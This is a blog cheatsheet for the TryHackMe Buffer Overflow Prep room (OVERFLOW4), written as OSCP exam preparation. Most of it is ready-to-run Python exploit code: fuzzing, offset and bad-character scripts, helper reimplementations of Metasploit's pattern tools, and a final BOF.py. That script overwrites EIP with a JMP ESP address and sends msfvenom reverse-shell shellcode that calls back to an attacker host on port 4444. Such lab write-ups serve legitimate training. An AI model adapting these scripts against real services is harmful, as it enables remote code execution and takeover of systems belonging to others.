TryHackMe – Buffer Overflow Prep cheatsheet

Hi everyone!

This post is a write-up of John Hammond’s recent video on the TryHackMe Buffer Overflow Prep room (OSCP preparation). You can see his video here:

Anyway, I will be using the OVERFLOW4 prefix instead, so watch his video if you haven’t. The cheatsheet below lets you quickly copy, paste and tweak the scripts, especially during your OSCP exam.

Steps

  1. Fuzz for the rough buffer length that overflows EIP/RET (fuzzing.py).
  2. Find the exact offset of the four bytes that land in EIP (findoffset.py).
    • Use Metasploit’s pattern_create.rb to generate a cyclic pattern of the length found while fuzzing.
    • Use Metasploit’s pattern_offset.rb with the value shown in EIP at the crash to get the offset.
  3. Find the bad chars that corrupt the payload placed after the RET location (findbadchars.py).
    • \x00 is always a bad char. Every application has its own set (\x0a and \x0d are frequent offenders in line-based protocols), so only trust what the debugger shows you.
    • Send 0x01 to 0xFF after the RET location, then compare the stack at ESP with what was sent. Take the first byte that is wrong or missing, add it to the badchar list, and repeat until every byte from 0x01 to 0xFF arrives intact. Remove only one char per run: a bad char often corrupts the byte that follows it, and that byte is usually fine once the real offender is gone.
  4. Find a JMP ESP instruction with mona and pack its address little-endian using struct.pack().
    • Inside Immunity Debugger: !mona jmp -r esp -cpb "\x00<other bad chars>"
  5. Generate reverse-shell shellcode with msfvenom, passing the bad chars in the -b flag.
  6. Send the final exploit (BOF.py).
    • Include a NOP sled of around 32 bytes before the shellcode: msfvenom’s encoders prepend a decoder stub that uses the stack near ESP, and the sled keeps it from overwriting the start of the payload.

Fuzzing.py

Keep increasing the buffer length until EIP in Immunity Debugger reads 41414141 (four ‘A’s), which confirms the return address on the stack has been overwritten.

#!/usr/bin/env python3

import socket

host, port = "10.10.36.169", 1337  # change to the victim's IP and port

prefix = b'OVERFLOW4 '  # remove the prefix if your target does not need one
length = 4000           # raise or lower until the program crashes with EIP = 41414141
buffer = b'A' * length

# craft payload
payload = prefix + buffer


with socket.socket() as s:
	s.connect((host, port))
	s.send(payload)

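Editing the 4000 by hand and re-running works, but the same probe is easy to loop. The script below is an added example, not from the original post or the video: it sends growing runs of ‘A’s and treats a connection that stops answering as the crash, reporting the last length that survived and the first that did not. The transport is passed in as a function so the loop can be exercised without a target; the default send_once assumes, as the room’s oscp.exe does, that the service greets on connect and answers each command.

```python
#!/usr/bin/env python3
"""Incremental fuzzer: find the rough buffer length that crashes the service."""
import socket

HOST, PORT = "10.10.36.169", 1337   # victim IP and port (same as the page's scripts)
PREFIX = b"OVERFLOW4 "


def send_once(host, port, payload, timeout=5):
    """Default transport. Raises OSError (timeout / reset) once the service has died.

    Assumption: the target sends a banner on connect and replies to each
    command, which is how the room's oscp.exe behaves. If your target sends
    no banner, drop the first recv or it will time out and look like a crash."""
    with socket.create_connection((host, port), timeout=timeout) as s:
        s.recv(1024)        # banner
        s.sendall(payload)
        s.recv(1024)        # a dead service times out or resets the connection here


def fuzz(send, prefix=PREFIX, start=100, step=100, max_len=4000):
    """Grow the buffer by `step` bytes per round until `send` raises.

    Returns (last_len_that_survived, first_len_that_crashed); the second value
    is None if max_len was reached without a crash. The exact offset lies
    between the two, which is what pattern_create/pattern_offset then pin down."""
    last_ok = 0
    for length in range(start, max_len + 1, step):
        payload = prefix + b"A" * length
        try:
            send(payload)
        except OSError as exc:          # socket.timeout and ConnectionError are both OSError
            print(f"crashed at {length} bytes ({exc.__class__.__name__})")
            return last_ok, length
        last_ok = length
    return last_ok, None


if __name__ == "__main__":
    good, crashed = fuzz(lambda p: send_once(HOST, PORT, p))
    print(f"survived {good}, crashed at {crashed}; EIP should now read 41414141 in Immunity")
```

Because the crash is detected by the connection dying, restart the program in Immunity between fuzzing rounds; a service that is already dead makes every length look bad.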
Findoffset.py

Use a pattern of the buffer length you found while fuzzing; if that is not 4000, regenerate it with Metasploit’s pattern_create.rb. When the program crashes, note the value in EIP for pattern_offset.rb.

#!/usr/bin/env python3

import socket

host, port = "10.10.36.169", 1337

prefix = b'OVERFLOW4 '
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 4000
# (use the length that crashed the program in fuzzing.py)
pattern = (b'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9As0As1As2As3As4As5As6As7As8As9At0At1At2At3At4At5At6At7At8At9Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9Av0Av1Av2Av3Av4Av5Av6Av7Av8Av9Aw0Aw1Aw2Aw3Aw4Aw5Aw6Aw7Aw8Aw9Ax0Ax1Ax2Ax3Ax4Ax5Ax6Ax7Ax8Ax9Ay0Ay1Ay2Ay3Ay4Ay5Ay6Ay7Ay8Ay9Az0Az1Az2Az3Az4Az5Az6Az7Az8Az9Ba0Ba1Ba2Ba3Ba4Ba5Ba6Ba7Ba8Ba9Bb0Bb1Bb2Bb3Bb4Bb5Bb6Bb7Bb8Bb9Bc0Bc1Bc2Bc3Bc4Bc5Bc6Bc7Bc8Bc9Bd0Bd1Bd2Bd3Bd4Bd5Bd6Bd7Bd8Bd9Be0Be1Be2Be3Be4Be5Be6Be7Be8Be9Bf0Bf1Bf2Bf3Bf4Bf5Bf6Bf7Bf8Bf9Bg0Bg1Bg2Bg3Bg4Bg5Bg6Bg7Bg8Bg9Bh0Bh1Bh2Bh3Bh4Bh5Bh6Bh7Bh8Bh9Bi0Bi1Bi2Bi3Bi4Bi5Bi6Bi7Bi8Bi9Bj0Bj1Bj2Bj3Bj4Bj5Bj6Bj7Bj8Bj9Bk0Bk1Bk2Bk3Bk4Bk5Bk6Bk7Bk8Bk9Bl0Bl1Bl2Bl3Bl4Bl5Bl6Bl7Bl8Bl9Bm0Bm1Bm2Bm3Bm4Bm5Bm6Bm7Bm8Bm9Bn0Bn1Bn2Bn3Bn4Bn5Bn6Bn7Bn8Bn9Bo0Bo1Bo2Bo3Bo4Bo5Bo6Bo7Bo8Bo9Bp0Bp1Bp2Bp3Bp4Bp5Bp6Bp7Bp8Bp9Bq0Bq1Bq2Bq3Bq4Bq5Bq6Bq7Bq8Bq9Br0Br1Br2Br3Br4Br5Br6Br7Br8Br9Bs0Bs1Bs2Bs3Bs4Bs5Bs6Bs7Bs8Bs9Bt0Bt1Bt2Bt3Bt4Bt5Bt6Bt7Bt8Bt9Bu0Bu1Bu2Bu3Bu4Bu5Bu6Bu7Bu8Bu9Bv0Bv1Bv2Bv3Bv4Bv5Bv6Bv7Bv8Bv9Bw0Bw1Bw2Bw3Bw4Bw5Bw6Bw7Bw8Bw9Bx0Bx1Bx2Bx3Bx4Bx5Bx6Bx7Bx8Bx9By0By1By2By3By4By5By6By7By8By9Bz0Bz1Bz2Bz3Bz4Bz5Bz6Bz7Bz8Bz9Ca0Ca1Ca2Ca3Ca4Ca5Ca6Ca7Ca8Ca9Cb0Cb1Cb2Cb3Cb4Cb5Cb6Cb7Cb8Cb9Cc0Cc1Cc2Cc3Cc4Cc5Cc6Cc7Cc8Cc9Cd0Cd1Cd2Cd3Cd4Cd5Cd6Cd7Cd8Cd9Ce0Ce1Ce2Ce3Ce4Ce5Ce6Ce7Ce8Ce9Cf0Cf1Cf2Cf3Cf4Cf5Cf6Cf7Cf8Cf9Cg0Cg1Cg2Cg3Cg4Cg5Cg6Cg7Cg8Cg9Ch0Ch1Ch2Ch3Ch4Ch5Ch6Ch7Ch8Ch9Ci0Ci1Ci2Ci3Ci4Ci5Ci6Ci7Ci8Ci9Cj0Cj1Cj2Cj3Cj4Cj5Cj6Cj7Cj8Cj9Ck0Ck1Ck2Ck3Ck4Ck5Ck6Ck7Ck8Ck9Cl0Cl1Cl2Cl3Cl4Cl5Cl6Cl7Cl8Cl9Cm0Cm1Cm2Cm3Cm4Cm5Cm6Cm7Cm8Cm9Cn0Cn1Cn2Cn3Cn4Cn5Cn6Cn7Cn8Cn9Co0Co1Co2'
           b'Co3Co4Co5Co6Co7Co8Co9Cp0Cp1Cp2Cp3Cp4Cp5Cp6Cp7Cp8Cp9Cq0Cq1Cq2Cq3Cq4Cq5Cq6Cq7Cq8Cq9Cr0Cr1Cr2Cr3Cr4Cr5Cr6Cr7Cr8Cr9Cs0Cs1Cs2Cs3Cs4Cs5Cs6Cs7Cs8Cs9Ct0Ct1Ct2Ct3Ct4Ct5Ct6Ct7Ct8Ct9Cu0Cu1Cu2Cu3Cu4Cu5Cu6Cu7Cu8Cu9Cv0Cv1Cv2Cv3Cv4Cv5Cv6Cv7Cv8Cv9Cw0Cw1Cw2Cw3Cw4Cw5Cw6Cw7Cw8Cw9Cx0Cx1Cx2Cx3Cx4Cx5Cx6Cx7Cx8Cx9Cy0Cy1Cy2Cy3Cy4Cy5Cy6Cy7Cy8Cy9Cz0Cz1Cz2Cz3Cz4Cz5Cz6Cz7Cz8Cz9Da0Da1Da2Da3Da4Da5Da6Da7Da8Da9Db0Db1Db2Db3Db4Db5Db6Db7Db8Db9Dc0Dc1Dc2Dc3Dc4Dc5Dc6Dc7Dc8Dc9Dd0Dd1Dd2Dd3Dd4Dd5Dd6Dd7Dd8Dd9De0De1De2De3De4De5De6De7De8De9Df0Df1Df2Df3Df4Df5Df6Df7Df8Df9Dg0Dg1Dg2Dg3Dg4Dg5Dg6Dg7Dg8Dg9Dh0Dh1Dh2Dh3Dh4Dh5Dh6Dh7Dh8Dh9Di0Di1Di2Di3Di4Di5Di6Di7Di8Di9Dj0Dj1Dj2Dj3Dj4Dj5Dj6Dj7Dj8Dj9Dk0Dk1Dk2Dk3Dk4Dk5Dk6Dk7Dk8Dk9Dl0Dl1Dl2Dl3Dl4Dl5Dl6Dl7Dl8Dl9Dm0Dm1Dm2Dm3Dm4Dm5Dm6Dm7Dm8Dm9Dn0Dn1Dn2Dn3Dn4Dn5Dn6Dn7Dn8Dn9Do0Do1Do2Do3Do4Do5Do6Do7Do8Do9Dp0Dp1Dp2Dp3Dp4Dp5Dp6Dp7Dp8Dp9Dq0Dq1Dq2Dq3Dq4Dq5Dq6Dq7Dq8Dq9Dr0Dr1Dr2Dr3Dr4Dr5Dr6Dr7Dr8Dr9Ds0Ds1Ds2Ds3Ds4Ds5Ds6Ds7Ds8Ds9Dt0Dt1Dt2Dt3Dt4Dt5Dt6Dt7Dt8Dt9Du0Du1Du2Du3Du4Du5Du6Du7Du8Du9Dv0Dv1Dv2Dv3Dv4Dv5Dv6Dv7Dv8Dv9Dw0Dw1Dw2Dw3Dw4Dw5Dw6Dw7Dw8Dw9Dx0Dx1Dx2Dx3Dx4Dx5Dx6Dx7Dx8Dx9Dy0Dy1Dy2Dy3Dy4Dy5Dy6Dy7Dy8Dy9Dz0Dz1Dz2Dz3Dz4Dz5Dz6Dz7Dz8Dz9Ea0Ea1Ea2Ea3Ea4Ea5Ea6Ea7Ea8Ea9Eb0Eb1Eb2Eb3Eb4Eb5Eb6Eb7Eb8Eb9Ec0Ec1Ec2Ec3Ec4Ec5Ec6Ec7Ec8Ec9Ed0Ed1Ed2Ed3Ed4Ed5Ed6Ed7Ed8Ed9Ee0Ee1Ee2Ee3Ee4Ee5Ee6Ee7Ee8Ee9Ef0Ef1Ef2Ef3Ef4Ef5Ef6Ef7Ef8Ef9Eg0Eg1Eg2Eg3Eg4Eg5Eg6Eg7Eg8Eg9Eh0Eh1Eh2Eh3Eh4Eh5Eh6Eh7Eh8Eh9Ei0Ei1Ei2Ei3Ei4Ei5Ei6Ei7Ei8Ei9Ej0Ej1Ej2Ej3Ej4Ej5Ej6Ej7Ej8Ej9Ek0Ek1Ek2Ek3Ek4Ek5Ek6Ek7Ek8Ek9El0El1El2El3El4El5El6El7El8El9Em0Em1Em2Em3Em4Em5Em6Em7Em8Em9En0En1En2En3En4En5En6En7En8En9Eo0Eo1Eo2Eo3Eo4Eo5Eo6Eo7Eo8Eo9Ep0Ep1Ep2Ep3Ep4Ep5Ep6Ep7Ep8Ep9Eq0Eq1Eq2Eq3Eq4Eq5Eq6Eq7Eq8Eq9Er0Er1Er2Er3Er4Er5Er6Er7Er8Er9Es0Es1Es2Es3Es4Es5Es6Es7Es8Es9Et0Et1Et2Et3Et4Et5Et6Et7Et8Et9Eu0Eu1Eu2Eu3Eu4Eu5Eu6Eu7Eu8Eu9Ev0Ev1Ev2Ev3Ev4Ev5Ev6Ev7Ev8Ev9Ew0Ew1Ew2Ew3Ew4Ew5Ew6Ew7Ew8Ew9Ex0Ex1Ex2Ex3Ex4Ex5Ex6Ex7Ex8Ex9Ey0Ey1Ey2Ey3Ey4Ey5Ey6Ey7Ey8Ey9Ez0Ez1Ez2Ez3Ez4Ez5Ez6Ez7Ez8Ez9Fa0Fa1Fa2Fa3Fa4Fa5Fa6Fa7Fa8Fa9Fb0Fb1Fb2Fb3Fb4Fb5Fb6Fb7Fb8Fb9Fc0Fc1Fc2Fc3Fc4Fc5Fc6Fc7Fc8Fc'
           b'9Fd0Fd1Fd2F')

# craft payload
payload = prefix + pattern


with socket.socket() as s:
	s.connect((host, port))
	s.send(payload)

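Both Metasploit helpers are small enough to reimplement, which also shows where the 2026 used in the next two scripts comes from. This is an added example, not from the original post: pattern_create reproduces the Aa0Aa1… cyclic pattern (uppercase, lowercase, digit, last position cycling fastest, as Rex::Text.pattern_create does), and pattern_offset takes the value Immunity shows in EIP, packs it little-endian to recover the four bytes as they sat in memory, and finds them in the pattern.

```python
#!/usr/bin/env python3
"""Pure-Python stand-ins for pattern_create.rb and pattern_offset.rb."""
import itertools
import string
import struct

UPPER, LOWER, DIGIT = string.ascii_uppercase, string.ascii_lowercase, string.digits


def pattern_create(length):
    """Cyclic pattern b'Aa0Aa1Aa2...Aa9Ab0...' truncated to `length` bytes.

    Every 3-byte chunk is unique for the first 26*26*10*3 = 20280 bytes, so
    any 4 consecutive bytes pin down their position in the buffer."""
    chunks = ("".join(t) for t in itertools.product(UPPER, LOWER, DIGIT))
    out, total = [], 0
    for chunk in chunks:
        if total >= length:
            break
        out.append(chunk)
        total += len(chunk)
    return "".join(out)[:length].encode()


def pattern_offset(eip, length=4000):
    """Offset into the pattern of the 4 bytes that ended up in EIP.

    `eip` is the value as the debugger displays it, e.g. '70433570' or
    0x70433570. x86 is little-endian, so the bytes in memory are reversed:
    70 43 35 70 (display) -> 70 35 43 70 (memory) -> b'p5Cp'.
    Raises ValueError if those bytes are not in a pattern of `length`."""
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip)
    idx = pattern_create(length).find(needle)
    if idx < 0:
        raise ValueError(f"{needle!r} not found in a {length}-byte pattern")
    return idx


if __name__ == "__main__":
    print(pattern_create(4000).decode())    # paste into findoffset.py
    print(pattern_offset("70433570"))       # -> 2026, the offset used below
```

If pattern_offset raises, the most common cause is a pattern length that differs from the one actually sent; pass the same length to both functions.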
Findbadchars.py

Set the offset to the value pattern_offset.rb returned for the EIP contents, and use BBBB as the placeholder return address: EIP should now read 42424242, and ESP points at the byte right after it, which is where the character array lands.

Start with an empty badchar list. Send the array, then look at the stack from ESP onwards (right-click ESP, Follow in Dump) and find the first byte that is wrong or missing. Add it to badchar, re-run, and repeat until every byte from 0x01 to 0xFF arrives intact. 0x00 is left out from the start because it is always bad.

#!/usr/bin/env python3

import socket

host, port = "10.10.36.169", 1337

# start with b'' and add one char per run, in the order the debugger reveals them
badchar = b'\xA9\xCD\xD4'
# 0x01..0xFF minus the known bad chars; 0x00 is never sent because it is always bad
allchar = bytes(c for c in range(1, 256) if c not in badchar)


length = 4000           # change to the value you discovered at fuzzing.py
prefix = b'OVERFLOW4 '
offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = b'BBBB'           # EIP should read 42424242; ESP points at the byte right after it
remaining = b'C' * (length - len(offset) - len(RET) - len(allchar))

# craft payload
payload = prefix + offset + RET + allchar + remaining


with socket.socket() as s:
	s.connect((host, port))
	s.send(payload)

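The compare step is where most mistakes happen, so here is the debugger-side half of it as code. This is an added example, not from the original post: build_allchars produces the same 0x01..0xFF probe that findbadchars.py sends, parse_dump pulls the raw bytes out of a hex dump copied from Immunity’s dump pane (the row layout of address, 8 hex bytes, ASCII is my assumption about that pane; adjust bytes_per_row if yours differs), and first_mismatch reports the first byte that differs or is missing. The sample dump is constructed. Inside Immunity, !mona bytearray -b "\x00" followed by !mona compare -f bytearray.bin -a <ESP> performs the same comparison for you.

```python
#!/usr/bin/env python3
"""Find bad chars by diffing what was sent against what landed on the stack."""
import string

# constructed sample of what gets copied out of the dump pane (not a real capture)
SAMPLE_DUMP = """\
0019FA30  01 02 03 04 05 06 07 08  ........
0019FA38  09 0A 0B 0C 0D 0E 0F 10  ........
"""


def build_allchars(badchars=b""):
    """0x01..0xFF with the already-known bad chars removed.

    0x00 is never sent: it terminates C strings, so it is bad for practically
    every target, which is why the list on this page starts at 0x01."""
    return bytes(c for c in range(1, 256) if c not in badchars)


def parse_dump(text, bytes_per_row=8):
    """Raw bytes from a debugger hex dump copied as text.

    Assumed row format (Immunity's dump pane): '<address>  <hex> <hex> ...  <ascii>'.
    Only `bytes_per_row` tokens after the address are read, and reading stops
    at the first token that is not two hex digits, so the ASCII column is
    never mistaken for data."""
    out = bytearray()
    for line in text.splitlines():
        for tok in line.split()[1:1 + bytes_per_row]:     # [0] is the address
            if len(tok) != 2 or any(ch not in string.hexdigits for ch in tok):
                break
            out.append(int(tok, 16))
    return bytes(out)


def first_mismatch(sent, observed):
    """(offset, byte sent, byte seen) of the first difference, or None if intact.

    The byte seen is None when the dump is shorter than what was sent, i.e.
    the target truncated the buffer at that position. Trust only the FIRST
    hit per run: a bad char commonly mangles or truncates everything behind
    it, so the following bytes may be fine once it is removed."""
    for i, (s, o) in enumerate(zip(sent, observed)):
        if s != o:
            return i, s, o
    if len(observed) < len(sent):
        return len(observed), sent[len(observed)], None
    return None


def next_badchar(sent, observed):
    """The single byte to append to the badchar list after this run, or None."""
    hit = first_mismatch(sent, observed)
    return None if hit is None else hit[1]


if __name__ == "__main__":
    sent = build_allchars()
    seen = bytearray(sent)
    seen[0xA8] = 0x00                     # constructed: 0xA9 came back as 0x00
    print(first_mismatch(sent, bytes(seen)))   # (168, 169, 0): add \xA9 and re-send
    print(parse_dump(SAMPLE_DUMP).hex())
```

Compare only the bytes that follow RET (ESP onwards): the ‘A’ padding and BBBB before it tell you nothing about bad chars.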
BOF.py

Remember to change the LHOST (and LPORT) in the msfvenom command to your attacking machine. Also change the bad characters in the "-b" flag to the ones you found; they must match the ones given to mona’s -cpb, otherwise either the RET address or the encoded shellcode may contain a byte the target mangles.

As for finding the "JMP ESP" address, either of these mona commands will do:

  • !mona jmp -r esp -cpb "\x00"
  • !mona find -s "jmp esp" -type instr -cm aslr=false,rebase=false,nx=false -cpb "\x00"

Both search the modules loaded in the debugged process. -cpb drops any address that contains a bad char, and the -cm criteria on the second command keep only modules whose addresses do not move between runs (no ASLR, not rebased) and whose memory is executable. Prefer an address from such a module, and confirm in the disassembler that it really is FF E4 (JMP ESP) before using it.

#!/usr/bin/env python3

import socket
import struct

# pack a 32-bit address little-endian, the byte order x86 reads it from the stack
def p32(data):
	return struct.pack("<I", data)


host, port = "10.10.36.169", 1337


length = 4000           # change to the value you discovered at fuzzing.py
prefix = b"OVERFLOW4 "
offset = b'A' * 2026	# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q 70433570
RET = p32(0x625011bb)	# !mona jmp -r esp -cpb "\x00\xA9\xCD\xD4"
NOP = b'\x90' * 32      # sled so the encoder's decoder stub cannot clobber the start of the shellcode

# msfvenom -p windows/shell_reverse_tcp LHOST=10.4.39.1 LPORT=4444 EXITFUNC=thread  -f py -b "\x00\xA9\xCD\xD4"
buf =  b""
buf += b"\xb8\xc1\x3f\x75\x83\xdb\xdd\xd9\x74\x24\xf4\x5a\x29"
buf += b"\xc9\xb1\x52\x83\xea\xfc\x31\x42\x0e\x03\x83\x31\x97"
buf += b"\x76\xff\xa6\xd5\x79\xff\x36\xba\xf0\x1a\x07\xfa\x67"
buf += b"\x6f\x38\xca\xec\x3d\xb5\xa1\xa1\xd5\x4e\xc7\x6d\xda"
buf += b"\xe7\x62\x48\xd5\xf8\xdf\xa8\x74\x7b\x22\xfd\x56\x42"
buf += b"\xed\xf0\x97\x83\x10\xf8\xc5\x5c\x5e\xaf\xf9\xe9\x2a"
buf += b"\x6c\x72\xa1\xbb\xf4\x67\x72\xbd\xd5\x36\x08\xe4\xf5"
buf += b"\xb9\xdd\x9c\xbf\xa1\x02\x98\x76\x5a\xf0\x56\x89\x8a"
buf += b"\xc8\x97\x26\xf3\xe4\x65\x36\x34\xc2\x95\x4d\x4c\x30"
buf += b"\x2b\x56\x8b\x4a\xf7\xd3\x0f\xec\x7c\x43\xeb\x0c\x50"
buf += b"\x12\x78\x02\x1d\x50\x26\x07\xa0\xb5\x5d\x33\x29\x38"
buf += b"\xb1\xb5\x69\x1f\x15\x9d\x2a\x3e\x0c\x7b\x9c\x3f\x4e"
buf += b"\x24\x41\x9a\x05\xc9\x96\x97\x44\x86\x5b\x9a\x76\x56"
buf += b"\xf4\xad\x05\x64\x5b\x06\x81\xc4\x14\x80\x56\x2a\x0f"
buf += b"\x74\xc8\xd5\xb0\x85\xc1\x11\xe4\xd5\x79\xb3\x85\xbd"
buf += b"\x79\x3c\x50\x11\x29\x92\x0b\xd2\x99\x52\xfc\xba\xf3"
buf += b"\x5c\x23\xda\xfc\xb6\x4c\x71\x07\x51\x79\x82\x20\x79"
buf += b"\x15\x88\x2e\x68\xba\x05\xc8\xe0\x52\x40\x43\x9d\xcb"
buf += b"\xc9\x1f\x3c\x13\xc4\x5a\x7e\x9f\xeb\x9b\x31\x68\x81"
buf += b"\x8f\xa6\x98\xdc\xed\x61\xa6\xca\x99\xee\x35\x91\x59"
buf += b"\x78\x26\x0e\x0e\x2d\x98\x47\xda\xc3\x83\xf1\xf8\x19"
buf += b"\x55\x39\xb8\xc5\xa6\xc4\x41\x8b\x93\xe2\x51\x55\x1b"
buf += b"\xaf\x05\x09\x4a\x79\xf3\xef\x24\xcb\xad\xb9\x9b\x85"
buf += b"\x39\x3f\xd0\x15\x3f\x40\x3d\xe0\xdf\xf1\xe8\xb5\xe0"
buf += b"\x3e\x7d\x32\x99\x22\x1d\xbd\x70\xe7\x3d\x5c\x50\x12"
buf += b"\xd6\xf9\x31\x9f\xbb\xf9\xec\xdc\xc5\x79\x04\x9d\x31"
buf += b"\x61\x6d\x98\x7e\x25\x9e\xd0\xef\xc0\xa0\x47\x0f\xc1"

# everything after the prefix must fit in the length that crashed the program,
# otherwise the tail of the shellcode is cut off
assert len(offset) + len(RET) + len(NOP) + len(buf) <= length, "shellcode does not fit"
remaining = b'C' * (length - len(offset) - len(RET) - len(NOP) - len(buf))

# craft payload
payload = prefix + offset + RET + NOP + buf + remaining


with socket.socket() as s:
	s.connect((host, port))
	s.send(payload)

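Two things go wrong in this last step more often than the shellcode itself: the JMP ESP address or the encoded shellcode still contains a bad char, or offset + RET + NOPs + shellcode no longer fit in the length that crashed the program. The following added example (not from the original post) assembles the same layout as BOF.py and refuses to build a payload with either problem. The shellcode used here is a constructed placeholder, a run of INT3 (\xCC), not the msfvenom output above; it is also a cheap way to confirm the jump lands, because Immunity then stops with a breakpoint exception inside the sled.

```python
#!/usr/bin/env python3
"""Assemble the final buffer with the checks BOF.py leaves to the operator."""
import struct

BADCHARS = b"\x00\xA9\xCD\xD4"      # the set passed to msfvenom -b and mona -cpb on this page


def p32(addr):
    """32-bit address packed little-endian, as x86 expects it on the stack."""
    return struct.pack("<I", addr)


def check_badchars(label, data, badchars=BADCHARS):
    """Raise ValueError naming every bad char that appears in `data`."""
    hits = sorted({c for c in data if c in badchars})
    if hits:
        raise ValueError(f"{label} contains bad chars: {', '.join(hex(c) for c in hits)}")


def build_payload(prefix, offset, ret, shellcode, length, nop_len=32, badchars=BADCHARS):
    """prefix + 'A'*offset + RET + NOP sled + shellcode + 'C' padding.

    `length` is the crash length from fuzzing: everything after the prefix
    must fit in it, or the tail of the shellcode never reaches the buffer.
    RET is checked after packing because a bad char can appear in any byte
    of the address (0x62501100 would end with a \\x00 in memory)."""
    ret_bytes = p32(ret)
    check_badchars("RET", ret_bytes, badchars)
    check_badchars("shellcode", shellcode, badchars)
    body = b"A" * offset + ret_bytes + b"\x90" * nop_len + shellcode
    if len(body) > length:
        raise ValueError(f"need {len(body)} bytes after the prefix but the crash length is {length}")
    return prefix + body + b"C" * (length - len(body))


if __name__ == "__main__":
    # constructed stand-in for the msfvenom output: INT3s make the debugger pause on landing
    placeholder = b"\xcc" * 351
    prefix = b"OVERFLOW4 "
    payload = build_payload(prefix, 2026, 0x625011bb, placeholder, 4000)
    base = len(prefix) + 2026
    print(len(payload), payload[base:base + 4].hex())    # RET bytes as they go over the wire
```

Swap the placeholder for the msfvenom buf once the INT3 run stops the debugger at ESP; if it does not, the RET address or offset is wrong, not the shellcode.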
I hope these tabs have been helpful to you. Feel free to leave any comments below. If you like my content, do follow me via email. You may also send me some tips if you like my work and want to see more of such content. Funds will mostly be used for my boba milk tea addiction and the cost of hosting the website as well as the domain name fee. The link is here. 🙂
